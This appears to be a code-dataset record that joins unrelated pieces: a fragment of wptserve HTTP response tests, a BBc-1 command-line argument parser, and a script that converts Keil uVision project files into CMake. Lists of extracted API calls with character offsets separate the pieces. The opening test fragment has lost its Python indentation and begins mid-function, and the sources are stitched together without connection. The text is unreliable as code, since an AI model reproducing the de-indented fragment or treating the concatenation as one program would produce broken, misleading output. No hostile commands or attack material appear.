response.writer.write_raw_content(infile)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
resp = self.request(route[1])
assert resp.getcode() == 202
assert resp.info()["X-TEST"] == "PASS"
assert resp.read() == b"Content"
def test_write_raw_none(self):
@wptserve.handlers.handler
def handler(request, response):
with pytest.raises(ValueError):
response.writer.write_raw_content(None)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
self.request(route[1])
def test_write_raw_contents_invalid_http(self):
resp_content = b"INVALID HTTP"
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_content(resp_content)
route = ("GET", "/test/test_write_raw_content", handler)
self.server.router.register(*route)
with pytest.raises(BadStatusLine) as e:
self.request(route[1])
assert str(e.value) == resp_content.decode('utf-8')
class TestH2Response(TestUsingH2Server):
def test_write_without_ending_stream(self):
data = b"TEST"
@wptserve.handlers.handler
def handler(request, response):
headers = [
('server', 'test-h2'),
('test', 'PASS'),
]
response.writer.write_headers(headers, 202)
response.writer.write_data_frame(data, False)
# Should detect stream isn't ended and call `writer.end_stream()`
route = ("GET", "/h2test/test", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 202
assert [x for x in resp.headers.items()] == [('server', 'test-h2'), ('test', 'PASS')]
assert resp.content == data
def test_set_error(self):
@wptserve.handlers.handler
def handler(request, response):
response.set_error(503, message="Test error")
route = ("GET", "/h2test/test_set_error", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 503
assert json.loads(resp.content) == json.loads("{\"error\": {\"message\": \"Test error\", \"code\": 503}}")
def test_file_like_response(self):
@wptserve.handlers.handler
def handler(request, response):
content = BytesIO(b"Hello, world!")
response.content = content
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
assert resp.content == b"Hello, world!"
def test_list_response(self):
@wptserve.handlers.handler
def handler(request, response):
response.content = ['hello', 'world']
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
assert resp.content == b"helloworld"
def test_content_longer_than_frame_size(self):
@wptserve.handlers.handler
def handler(request, response):
size = response.writer.get_max_payload_size()
content = "a" * (size + 5)
return [('payload_size', size)], content
route = ("GET", "/h2test/test_content_longer_than_frame_size", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
payload_size = int(resp.headers['payload_size'])
assert payload_size
assert resp.content == b"a" * (payload_size + 5)
def test_encode(self):
@wptserve.handlers.handler
def handler(request, response):
response.encoding = "utf8"
t = response.writer.encode("hello")
assert t == b"hello"
with pytest.raises(ValueError):
response.writer.encode(None)
route = ("GET", "/h2test/test_content_longer_than_frame_size", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 200
def test_raw_header_frame(self):
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_header_frame([
(':status', '204'),
('server', 'TEST-H2')
], end_headers=True)
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 204
assert resp.headers['server'] == 'TEST-H2'
assert resp.content == b''
def test_raw_data_frame(self):
@wptserve.handlers.handler
def handler(request, response):
response.write_status_headers()
response.writer.write_raw_data_frame(data=b'Hello world', end_stream=True)
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.content == b'Hello world'
def test_raw_header_continuation_frame(self):
@wptserve.handlers.handler
def handler(request, response):
response.writer.write_raw_header_frame([
(':status', '204')
])
response.writer.write_raw_continuation_frame([
('server', 'TEST-H2')
], end_headers=True)
route = ("GET", "/h2test/test_file_like_response", handler)
self.server.router.register(*route)
resp = self.client.get(route[1])
assert resp.status_code == 204
assert resp.headers['server'] == 'TEST-H2'
assert resp.content == b''
if __name__ == '__main__':
unittest.main()
| [
"json.loads",
"io.BytesIO",
"os.path.join",
"pytest.importorskip",
"pytest.raises",
"unittest.main",
"types.MethodType"
]
| [((140, 171), 'pytest.importorskip', 'pytest.importorskip', (['"""wptserve"""'], {}), "('wptserve')\n", (159, 171), False, 'import pytest\n'), ((11826, 11841), 'unittest.main', 'unittest.main', ([], {}), '()\n', (11839, 11841), False, 'import unittest\n'), ((603, 657), 'types.MethodType', 'types.MethodType', (['send_body_as_header', 'response.writer'], {}), '(send_body_as_header, response.writer)\n', (619, 657), False, 'import types\n'), ((1309, 1363), 'types.MethodType', 'types.MethodType', (['send_body_as_header', 'response.writer'], {}), '(send_body_as_header, response.writer)\n', (1325, 1363), False, 'import types\n'), ((6780, 6808), 'pytest.raises', 'pytest.raises', (['BadStatusLine'], {}), '(BadStatusLine)\n', (6793, 6808), False, 'import pytest\n'), ((8072, 8096), 'json.loads', 'json.loads', (['resp.content'], {}), '(resp.content)\n', (8082, 8096), False, 'import json\n'), ((8100, 8163), 'json.loads', 'json.loads', (['"""{"error": {"message": "Test error", "code": 503}}"""'], {}), '(\'{"error": {"message": "Test error", "code": 503}}\')\n', (8110, 8163), False, 'import json\n'), ((8309, 8334), 'io.BytesIO', 'BytesIO', (["b'Hello, world!'"], {}), "(b'Hello, world!')\n", (8316, 8334), False, 'from io import BytesIO\n'), ((6204, 6229), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (6217, 6229), False, 'import pytest\n'), ((9881, 9906), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (9894, 9906), False, 'import pytest\n'), ((5691, 5726), 'os.path.join', 'os.path.join', (['doc_root', '"""test.asis"""'], {}), "(doc_root, 'test.asis')\n", (5703, 5726), False, 'import os\n')] |
# -*- coding: utf-8 -*-
"""
Copyright (c) 2017 beyond-blockchain.org.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from argparse import ArgumentParser
import sys
sys.path.extend(["../../"])
from bbc1.core.bbc_config import DEFAULT_CORE_PORT, DEFAULT_P2P_PORT
DEFAULT_SERV_ADDR = '127.0.0.1'
def parser():
usage = 'python {} [--coreport <number>] [--p2pport <number>] [--workingdir <dir>] ' \
'[--config <filename>] [--default_config <filename>] [--nodekey] [--no_nodekey] [--domain0] ' \
'[--ledgersubsystem] [--ip4addr <IP addr>] [--ip6addr <IPv6 addr>] ' \
'[--log <filename>] [--verbose_level <string>] [--daemon] [--kill] [--help]'.format(__file__)
argparser = ArgumentParser(usage=usage)
argparser.add_argument('-cp', '--coreport', type=int, default=DEFAULT_CORE_PORT, help='waiting TCP port')
argparser.add_argument('-pp', '--p2pport', type=int, default=DEFAULT_P2P_PORT, help='waiting TCP port')
argparser.add_argument('-w', '--workingdir', type=str, default=".bbc1", help='working directory name')
argparser.add_argument('-c', '--config', type=str, default=None, help='config file name')
argparser.add_argument('--default_config', type=str, default=None, help='default config file')
argparser.add_argument('--nodekey', action='store_true', help='use node_key for admin command')
argparser.add_argument('--no_nodekey', action='store_true', help='don\'t use node_key for admin command')
argparser.add_argument('--domain0', action='store_true', help='connect to domain_global_0')
argparser.add_argument('--ledgersubsystem', action='store_true', help='use ledger_subsystem')
argparser.add_argument('--ip4addr', type=str, default=None, help='IPv4 address exposed to the external network')
argparser.add_argument('--ip6addr', type=str, default=None, help='IPv6 address exposed to the external network')
argparser.add_argument('-l', '--log', type=str, default="-", help='log filename/"-" means STDOUT')
argparser.add_argument('-d', '--daemon', action='store_true', help='run in background')
argparser.add_argument('-k', '--kill', action='store_true', help='kill the daemon')
argparser.add_argument('-v', '--verbose_level', type=str, default="debug",
help='log level all/debug/info/warning/error/critical/none')
args = argparser.parse_args()
return args
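# Hedged usage sketch (illustrative, not part of the original module):
#   args = parser()
#   print(args.coreport, args.p2pport)  # DEFAULT_CORE_PORT / DEFAULT_P2P_PORT unless overridden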
| [
"sys.path.extend",
"argparse.ArgumentParser"
]
| [((646, 673), 'sys.path.extend', 'sys.path.extend', (["['../../']"], {}), "(['../../'])\n", (661, 673), False, 'import sys\n'), ((1197, 1224), 'argparse.ArgumentParser', 'ArgumentParser', ([], {'usage': 'usage'}), '(usage=usage)\n', (1211, 1224), False, 'from argparse import ArgumentParser\n')] |
"""
Usage:
main.py [<project>]
Options:
<project> Path to the .uvprojx file (Keil® µVision5 Project File).
The .uvoptx file (Keil® µVision5 Project Options file) will
be located automatically as it shall be adjacent to the
.uvprojx file, having the same filename.
If this is a directory, .uvprojx is found automatically (if
multiple found then the latest changed is chosen).
If not provided then the current working directory is chosen
as a project directory.
"""
import enum
import operator
import os
import warnings
from collections import defaultdict
from dataclasses import dataclass
from os import DirEntry
from pathlib import Path
from typing import List, Optional, Union, Iterable, Collection, Set, Tuple, Callable, Dict, Iterator
from docopt import docopt
from lxml import etree
__author__ = "<NAME>"
UnknownInt = int
UnknownBool = bool
@enum.unique
class Language(enum.Enum):
ASM = "Assembler"
C = "C"
CPP = "C++"
@enum.unique
class FileType(enum.Enum):
C_SOURCE = 1
"""C Source file"""
ASM_SOURCE = 2
"""Assembly language file"""
OBJECT = 3
"""Object file"""
LIBRARY = 4
"""Library file"""
TEXT_DOCUMENT = 5
"""Text Document file"""
CUSTOM = 7
"""Custom file"""
CPP_SOURCE = 8
"""C++ Source file"""
IMAGE = 9
"""Image file"""
# region XML data structures for Project File
@dataclass
class Target:
@dataclass
class Toolset:
number: int
name: str
@dataclass
class Compiler:
cc: str
ac6: bool
@dataclass
class Options:
@dataclass
class Common:
device: str
vendor: str
pack_id: str
pack_url: str
cpu: str
device_id: int
register_file: str
@dataclass
class Properties:
use_cpp_compiler: bool
common: Common
properties: Properties
@dataclass
class Build:
@dataclass
class Misc:
@dataclass
class Memory:
@enum.unique
class Type(enum.Enum):
"""TODO: Real meaning unknown."""
TYPE0 = 0
TYPE1 = 1
name: str
type: Type
start: int
size: int
cpu_type: str
memories: List[Memory]
@dataclass
class C:
optimization: int
strict: bool
c99: bool
gnu: bool
misc: List[str]
defines: List[str]
undefines: List[str]
include_paths: List[str]
@dataclass
class Asm:
misc: List[str]
defines: List[str]
undefines: List[str]
include_paths: List[str]
@dataclass
class Linker:
text_address_range: int
data_address_range: int
misc: List[str]
misc: Misc
c: C
asm: Asm
ld: Linker
@dataclass
class File:
name: str
type: FileType
path: str
include_in_build: bool
"""Whether this file is included in the build or ignored."""
always_build: bool
"""Whether to always build this file."""
@dataclass
class Group:
name: str
files: List['Target.File']
name: str
toolset: Toolset
compiler: Compiler
options: Options
build: Build
groups: List[Group]
@dataclass
class RTE:
@dataclass
class TargetInfo:
@enum.unique
class VersionMatchMode(enum.Enum):
FIXED = "fixed"
name: str
version_match_mode: Optional[VersionMatchMode]
@dataclass
class Package:
name: str
url: str
vendor: str
version: str
target_infos: List['RTE.TargetInfo']
@dataclass
class Component:
class_: str
group: str
vendor: str
version: str
condition: str
package: 'RTE.Package'
target_infos: List['RTE.TargetInfo']
@dataclass
class File:
@enum.unique
class Attribute(enum.Enum):
CONFIG = "config"
@enum.unique
class Category(enum.Enum):
SOURCE = "source"
attr: Attribute
category: Category
condition: Optional[str]
name: str
version: str
instance: str
component: 'RTE.Component'
package: 'RTE.Package'
target_infos: List['RTE.TargetInfo']
packages: List[Package]
components: List[Component]
files: List[File]
# endregion XML data structures for Project File
# region XML data structures for Project Options file
@dataclass
class File:
group_number: int
"""Number of the :cls:`Group` this file belongs to."""
number: int
"""Number of the file (global across all groups)."""
type: FileType
"""File type as selected in the Options for File ... -> Properties dialog"""
expanded: bool
"""Whether the file is expanded (include file dependencies shown) in the Project Window file browser."""
include_in_build: bool
"""Whether this file is included in the build or ignored."""
always_build: bool
"""Whether to always build this file."""
tv_exp_opt_dlg: UnknownBool
dave2: UnknownBool
path: str
filename: str
rte_flag: bool
"""Whether this file is part of/managed by the Keil MDK Run-Time Environment (RTE) and therefore read-only."""
shared: UnknownBool
_project_file: Target.File = None
"""Reference to the instance of this file from the Project File."""
@dataclass
class Group:
name: str
"""Group name as shown in the Project Window file browser."""
expanded: bool
"""Whether the group is expanded (files shown) in the Project Window file browser."""
tv_exp_opt_dlg: UnknownBool
cb_sel: UnknownBool
rte_flag: bool
"""Whether this group is part of/managed by the Keil MDK Run-Time Environment (RTE) and therefore read-only."""
files: List[File]
"""List of files in this group."""
_project_group: Target.Group = None
"""Reference to the instance of this group from the Project File."""
# endregion XML data structures for Project Options file
# region XML parsing helper functions
def text(element: etree.ElementBase, name: str, is_attribute: bool = False, nullable: bool = False) -> Optional[str]:
if is_attribute:
if nullable:
return element.attrib.get(name)
else:
return element.attrib[name]
value = element.xpath(name)
if (not value) and nullable:
return None
if len(value) != 1:
raise ValueError(f"Only one '{name}' tag per tree is supported, {len(value)} found")
return value[0].text
def strict_bool(element: etree.ElementBase, name: str, nullable: bool = False, *,
false_value: str = "0", true_value: str = "1") -> Optional[bool]:
value = text(element, name, nullable=nullable)
if value == false_value:
return False
if value == true_value:
return True
if (value is None) and nullable:
return None
raise ValueError(f"'{value}' (of {name}) is not valid boolean value")
def strict_hex(element: etree.ElementBase, name: str) -> int:
value = text(element, name)
if not value.startswith("0x"):
raise ValueError(f"'{value}' (of {name}) is not valid hexadecimal value")
return int(value, 16)
# endregion XML parsing helper functions
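# Hedged illustration of the helpers above (the XML snippet is an ad-hoc example,
# not taken from a real uVision project file):
def _demo_xml_parsing_helpers():
    node = etree.fromstring("<Target><TargetName>Debug</TargetName><uAC6>1</uAC6></Target>")
    assert text(node, "TargetName") == "Debug"
    assert strict_bool(node, "uAC6") is True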
@dataclass
class UVisionProject:
project_file_path: str
project_options_path: str
# region Project File
targets: List[Target]
# endregion Project File
# region Project Options
groups: List[Group]
"""Groups of files, as shown in the Project Window file browser."""
# endregion Project Options
@classmethod
def new(cls, project_file_path: str) -> 'UVisionProject':
fp_base = os.path.splitext(project_file_path)[0]
project_file_path = fp_base + ".uvprojx"
project_options_path = fp_base + ".uvoptx"
with open(project_file_path) as f:
# noinspection PyProtectedMember
xproj: etree._Element = etree.parse(f).getroot()
with open(project_options_path) as f:
# noinspection PyProtectedMember
xopt: etree._Element = etree.parse(f).getroot()
# region Project File
if xproj.tag != "Project":
raise ValueError("Invalid uVision Project File XML file")
# noinspection PyCallByClass,SpellCheckingInspection
targets = [
Target(
name=text(target, "TargetName"),
toolset=Target.Toolset(
number=strict_hex(target, "ToolsetNumber"),
name=text(target, "ToolsetName")
),
compiler=Target.Compiler(
cc=text(target, "pCCUsed", nullable=True),
ac6=strict_bool(target, "uAC6")
),
options=next(
# There is always only one package, but using generator is clean and
# effective way of creating an inline local variable.
Target.Options(
common=next(
Target.Options.Common(
device=text(tco, "Device"),
vendor=text(tco, "Vendor"),
pack_id=text(tco, "PackID"),
pack_url=text(tco, "PackURL"),
cpu=text(tco, "Cpu"),
device_id=text(tco, "DeviceId"),
register_file=text(tco, "RegisterFile")
) for tco in to.xpath("TargetCommonOption")
),
properties=next(
Target.Options.Properties(
use_cpp_compiler=strict_bool(tcp, "UseCPPCompiler"),
) for tcp in to.xpath("CommonProperty")
)
) for to in target.xpath("TargetOption")
),
build=next(
Target.Build(
misc=Target.Build.Misc(
cpu_type=text(to_taa, "ArmAdsMisc/AdsCpuType"),
memories=[
Target.Build.Misc.Memory(
name=memory.tag,
type=Target.Build.Misc.Memory.Type(int(text(memory, "Type"))),
start=strict_hex(memory, "StartAddress"),
size=strict_hex(memory, "Size")
) for memory in to_taa.xpath("ArmAdsMisc/OnChipMemories/*")
]
),
c=next(
Target.Build.C(
optimization=int(text(to_taa_c, "Optim")),
strict=strict_bool(to_taa_c, "Strict"),
c99=strict_bool(to_taa_c, "uC99"),
gnu=strict_bool(to_taa_c, "uGnu"),
misc=[
mc.strip() for mc in text(to_taa_c, "VariousControls/MiscControls").split(",")
],
defines=[
mc.strip() for mc in text(to_taa_c, "VariousControls/Define").split(" ")
],
undefines=[
mc.strip() for mc in (text(to_taa_c, "VariousControls/Undefine") or "").split(" ")
],
include_paths=[
mc.strip() for mc in text(to_taa_c, "VariousControls/IncludePath").split(";")
]
) for to_taa_c in to_taa.xpath("Cads")
),
asm=next(
Target.Build.Asm(
misc=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/MiscControls") or "").split(",")
],
defines=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/Define") or "").split(" ")
],
undefines=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/Undefine") or "").split(" ")
],
include_paths=[
mc.strip() for mc in (text(to_taa_a, "VariousControls/IncludePath") or "").split(";")
]
) for to_taa_a in to_taa.xpath("Aads")
),
ld=next(
Target.Build.Linker(
text_address_range=strict_hex(to_taa_ld, "TextAddressRange"),
data_address_range=strict_hex(to_taa_ld, "DataAddressRange"),
misc=[
mc.strip() for mc in
text(to_taa_ld, "Misc").split(",") # TODO: Delimiter unknown
]
) for to_taa_ld in to_taa.xpath("LDads")
)
) for to_taa in target.xpath("TargetOption/TargetArmAds")
),
groups=[
Target.Group(
name=text(group, "GroupName"),
files=[
Target.File(
name=text(file, "FileName"),
type=FileType(int(text(file, "FileType"))),
path=text(file, "FilePath"),
include_in_build=strict_bool(file, "FileOption/CommonProperty/IncludeInBuild",
nullable=True),
always_build=strict_bool(file, "FileOption/CommonProperty/AlwaysBuild",
nullable=True, true_value="2")
) for file in group.xpath("Files/File")
]
) for group in target.xpath("Groups/Group")
]
) for target in xproj.xpath("Targets/Target")
]
# region RTE
# noinspection PyCallByClass,PyTypeChecker
rte = RTE(
packages=[
RTE.Package(
name=text(package, "name", True),
url=text(package, "url", True),
vendor=text(package, "vendor", True),
version=text(package, "version", True),
target_infos=[
RTE.TargetInfo(
name=text(ti, "name", True),
# Using generator and list only for local variable
version_match_mode=next(RTE.TargetInfo.VersionMatchMode(vmm) if vmm else None
for vmm in [text(ti, "versionMatchMode", True, True)])
) for ti in package.xpath("targetInfos/targetInfo")
]
) for package in xproj.xpath("RTE/packages/package")
],
components=[
RTE.Component(
class_=text(component, "Cclass", True),
group=text(component, "Cgroup", True),
vendor=text(component, "Cvendor", True),
version=text(component, "Cversion", True),
condition=text(component, "condition", True),
package=next(
# There is always only one package, but using generator is clean and
# effective way of creating an inline local variable.
# This new instance of package will be replaced below with reference to an actual matching
# instance of the package from rte.packages.
RTE.Package(
name=text(package, "name", True),
url=text(package, "url", True),
vendor=text(package, "vendor", True),
version=text(package, "version", True),
target_infos=None
) for package in component.xpath("package")
),
target_infos=[
RTE.TargetInfo(
name=text(ti, "name", True),
# TODO: Handle nullable
# RTE.TargetInfo.VersionMatchMode(text(ti, "versionMatchMode", True, True))
version_match_mode=None
) for ti in component.xpath("targetInfos/targetInfo")
]
) for component in xproj.xpath("RTE/components/component")
],
files=[
RTE.File(
attr=RTE.File.Attribute(text(file, "attr", True)),
category=RTE.File.Category(text(file, "category", True)),
condition=text(file, "condition", True, True),
name=text(file, "name", True),
version=text(file, "version", True),
instance=text(file, "instance"),
component=next(
RTE.Component(
class_=text(component, "Cclass", True),
group=text(component, "Cgroup", True),
vendor=text(component, "Cvendor", True),
version=text(component, "Cversion", True),
condition=text(component, "condition", True),
package=None,
target_infos=None
) for component in file.xpath("component")
),
package=None, # TODO
target_infos=None, # TODO
) for file in xproj.xpath("RTE/files/file")
]
)
# TODO: Connect actual references of the rte.packages and rte.packages.target_infos
for component in rte.components:
cp = component.package
component.package = None
cp.target_infos = None
for package in rte.packages:
# Temporally remove target_infos to enable usage of equality operator.
pti = package.target_infos
package.target_infos = None
if cp == package:
component.package = package
package.target_infos = pti
break
package.target_infos = pti
# endregion RTE
# endregion Project File
# region Project Options
if xopt.tag != "ProjectOpt":
raise ValueError("Invalid uVision Project Options XML file")
groups: List[Group] = []
for group in xopt.xpath("Group"):
group_name = text(group, "GroupName")
# Find this group in the Project File
xproj_group = next(g for g in next(iter(targets)).groups if (g.name == group_name))
# Find all files in this group and also in the Project File
files: List[File] = []
for file in group.xpath("File"):
file_type = FileType(int(text(file, "FileType")))
file_name = text(file, "FilenameWithoutPath")
xproj_file = next(f for f in xproj_group.files if (f.type == file_type and f.name == file_name))
files.append(File(
group_number=int(text(file, "GroupNumber")),
number=int(text(file, "FileNumber")),
type=file_type,
expanded=strict_bool(file, "tvExp"),
include_in_build=xproj_file.include_in_build,
always_build=xproj_file.always_build,
tv_exp_opt_dlg=strict_bool(file, "tvExpOptDlg"),
dave2=strict_bool(file, "bDave2"),
path=text(file, "PathWithFileName"),
filename=file_name,
rte_flag=strict_bool(file, "RteFlg"),
shared=strict_bool(file, "bShared")
))
groups.append(Group(
name=group_name,
expanded=strict_bool(group, "tvExp"),
tv_exp_opt_dlg=strict_bool(group, "tvExpOptDlg"),
cb_sel=strict_bool(group, "cbSel"),
rte_flag=strict_bool(group, "RteFlg"),
files=files
))
# There is no more *currently relevant* data in the Project Options file.
# endregion Project Options
# Add RTE files to the file groups to actually match the Project Window file browser.
for file in rte.files:
# Find the group to which this file belongs to (there shall be one and only one).
group = None
group_number = 1
for group_number, group in enumerate(groups, 1):
if group.files and group.files[0].group_number != group_number:
warnings.warn(f"Inconsistent group number {group.files[0].group_number} for group {group.name}"
f" (expected to be {group_number})")
if group.rte_flag and group.name.strip(":") == file.component.class_:
break
filename = os.path.basename(file.instance)
# Detect file type (this information is not provided for RTE files)
if filename.endswith(".s"):
file_type = FileType.ASM_SOURCE
elif filename.endswith(".c"):
file_type = FileType.C_SOURCE
elif filename.endswith(".cpp"):
file_type = FileType.CPP_SOURCE
elif filename.endswith(".h"):
file_type = FileType.TEXT_DOCUMENT
else:
warnings.warn(f"Unknown RTE file type '{file.instance}': {file}")
continue
group.files.append(File(
group_number=group_number,
number=max(f.number for g in groups for f in g.files) + 1,
type=file_type,
expanded=False,
include_in_build=True, # TODO: This information is available for RTE files
always_build=None,
tv_exp_opt_dlg=False, # TODO
dave2=False, # TODO
path=file.instance,
filename=os.path.basename(file.instance),
rte_flag=True,
shared=False
))
return cls(
project_file_path=project_file_path,
project_options_path=project_options_path,
targets=targets,
groups=groups
)
def source_files(self) -> Iterator[Tuple[File, Optional[Language], Optional[str]]]:
"""
Get all files grouped by the file type with group names as a comments.
"""
# Add source files
for group in self.groups:
comment = group.name
if group.rte_flag:
# RTE groups start with double colon (::).
comment = "RTE" + comment
# Group files by type and add one comment for every file type as they are in the separate sections.
files: Dict[Union[Language, None], List[File]] = defaultdict(list)
for file in group.files:
if file.type == FileType.ASM_SOURCE:
lang = Language.ASM
elif file.type == FileType.C_SOURCE:
lang = Language.C
elif file.type == FileType.TEXT_DOCUMENT:
lang = None
else:
warnings.warn(f"Unsupported file type: {file.type} for {file}")
continue
files[lang].append(file)
for lang, files in files.items():
comment_per_type = comment
for file in files:
yield file, lang, comment_per_type
comment_per_type = None
class CMake:
@dataclass
class String:
value: str
"""The actual string value."""
languages: Set[Language]
"""Set of all build configs in which this value is present."""
common: bool = False
comment: Optional[str] = None
"""Comment which will be added to the line before"""
def __eq__(self, o: 'CMake.String') -> bool:
if isinstance(o, type(self)):
return self.value == o.value
elif isinstance(o, str):
return self.value == o
return NotImplemented
def __init__(self) -> None:
self.include_paths: List[CMake.String] = []
self.defines: List[CMake.String] = []
self.undefines: List[CMake.String] = []
self.source_file_paths: List[CMake.String] = []
self.other_file_paths: List[CMake.String] = []
@classmethod
def _get(cls, lst: List[String], obj: str) -> String:
"""Get existing object from the list or append a new one to the end."""
try:
# noinspection PyTypeChecker
itm = lst[lst.index(obj)]
except ValueError:
# noinspection PyCallByClass
itm = cls.String(obj, set())
lst.append(itm)
return itm
@classmethod
def _add_values(cls, where: List[String], values: Union[str, Iterable[str]],
languages: Union[Language, Collection[Language], None], comment: Optional[str] = None) -> None:
if isinstance(languages, Language):
languages = [languages]
for val in values:
obj = cls._get(where, val)
if comment is not None:
# Add comment to the first value only
obj.comment = comment
comment = None
if languages:
obj.languages.update(languages)
@staticmethod
def _clean_paths(paths: Union[str, Iterable[str]]) -> List[str]:
if isinstance(paths, (str, Path)):
paths = [paths]
return [Path(p).as_posix() for p in map(os.path.normpath, paths)]
def add_include_paths(self, paths: Union[str, Iterable[str]], languages: Union[Language, Collection[Language]],
comment: str = None) -> None:
self._add_values(self.include_paths, self._clean_paths(paths), languages, comment)
def add_defines(self, defines: Union[str, Iterable[str]], languages: Union[Language, Collection[Language]],
comment: str = None) -> None:
self._add_values(self.defines, defines, languages, comment)
def add_undefines(self, undefines: Union[str, Iterable[str]], languages: Union[Language, Collection[Language]],
comment: str = None) -> None:
self._add_values(self.undefines, undefines, languages, comment)
def add_source_files(self, paths: Union[None, str, Iterable[str]],
languages: Union[Language, Collection[Language], None],
comment: str = None, include_in_build: bool = True) -> None:
paths = self._clean_paths(paths)
# If file is not included in the build, comment it
if include_in_build is False:
paths = ["# " + path for path in paths]
self._add_values(self.source_file_paths if languages else self.other_file_paths, paths, languages, comment)
def add_other_files(self, paths: Union[str, Iterable[str]], comment: str = None) -> None:
self.add_source_files(paths, None, comment)
def check_common(self) -> Set[Language]:
"""
Check which properties are common to all language configurations.
:return: Set of all used languages (languages with at least one property)
"""
all_props = (self.include_paths, self.defines, self.undefines, self.source_file_paths)
# Get all of the defined languages used
languages = {lang
for props in all_props
for prop in props
for lang in prop.languages}
for props in all_props:
for prop in props:
prop.common = (prop.languages == languages)
return languages
def __str__(self) -> str:
languages = sorted(self.check_common(), key=operator.attrgetter('value'))
ret_str = [
"# Made with CMake <> uVision project file synchronizer"
"# https://github.com/bojanpotocnik/cmake-uvision-syncer"
]
# Set of the build properties
prop_sets: List[Tuple[str, str, List[CMake.String], str]] = [
("definitions", "DEFINES", self.defines, "-D"),
("un-defines", "UNDEFINES", self.undefines, ""),
("include directories", "INCLUDE_DIRS", self.include_paths, ""),
("source files", "SOURCES", self.source_file_paths, ""),
]
# Set of the language configs per build property
sub_prop_sets: List[Tuple[str, str, Callable[[CMake.String], bool]]] = [
("Common", "COMMON", lambda prop: prop.common),
*((lang.value + " specific", lang.name,
lambda prop, lang_=lang: (not prop.common) and (lang_ in prop.languages))
for lang in languages)
]
def _add_section_files(comment: str, var_name: str, value_iterator: Iterable[CMake.String],
value_prefix: str = "") -> str:
s = (f"# {comment}\n"
f"set({var_name}")
value_str = ''
for value in value_iterator:
if value.comment is not None:
value_str += f"\n\t# {value.comment}"
value_str += f"\n\t{value_prefix}{value.value}"
            if len(value_str) != 0:
return s + value_str + "\n)"
else:
return None
for section_comment, section_var_prefix, section_props, val_prefix in prop_sets:
ss_str = []
for prop_set_comment, var_suffix, filter_fun in sub_prop_sets:
section_files = _add_section_files(
comment=f"{prop_set_comment} {section_comment}",
var_name=f"{section_var_prefix}_{var_suffix}",
value_iterator=filter(filter_fun, section_props),
value_prefix=val_prefix
)
if section_files is not None:
ss_str.append(section_files)
ret_str.append("\n\n".join(ss_str))
other_files = _add_section_files(
comment="Other files",
var_name="OTHER_FILES",
value_iterator=self.other_file_paths
)
if other_files is not None:
ret_str.append(other_files)
return "\n\n\n".join(ret_str)
def main() -> None:
# region Parse arguments
arguments = docopt(__doc__)
project_path: str = arguments["<project>"] or "."
if not os.path.isfile(project_path):
with os.scandir(project_path) as dirs: # type: Iterator[DirEntry]
projects = [de.path for de in dirs if (de.is_file() and (os.path.splitext(de.name)[1] == ".uvprojx"))]
if not projects:
raise FileNotFoundError(f"Could not find any .uvprojx file in '{project_path}'")
elif len(projects) > 1:
# Choose the latest file by modification time.
project_path = max(projects, key=os.path.getmtime)
else:
project_path = projects[0]
project_path = os.path.realpath(project_path)
# endregion Parse arguments
print(f"Using µVision5 Project File '{project_path}'")
# Parse uVision project XML files
uvp = UVisionProject.new(project_path)
# Generate CMake file and populate it with information from uVision project
cmake = CMake()
# Add Assembler properties
cmake.add_include_paths(uvp.targets[0].build.asm.include_paths, Language.ASM)
cmake.add_defines(uvp.targets[0].build.asm.defines, Language.ASM)
cmake.add_undefines(uvp.targets[0].build.asm.undefines, Language.ASM)
# Add C properties
cmake.add_include_paths(uvp.targets[0].build.c.include_paths, Language.C)
cmake.add_defines(uvp.targets[0].build.c.defines, Language.C)
cmake.add_undefines(uvp.targets[0].build.c.undefines, Language.C)
# Add source and other files
for file, lang, comment in uvp.source_files():
cmake.add_source_files(file.path, lang, comment, file.include_in_build)
fp_proj_cmake = os.path.join(os.path.dirname(uvp.project_file_path),
os.path.splitext(os.path.basename(uvp.project_file_path))[0] + ".cmake")
with open(fp_proj_cmake, 'w') as f:
print(cmake, file=f)
print(f"Generated CMake file '{fp_proj_cmake}'")
if __name__ == "__main__":
main()
| [
"operator.attrgetter",
"pathlib.Path",
"os.scandir",
"os.path.splitext",
"lxml.etree.parse",
"os.path.realpath",
"os.path.dirname",
"os.path.isfile",
"collections.defaultdict",
"os.path.basename",
"warnings.warn",
"docopt.docopt"
]
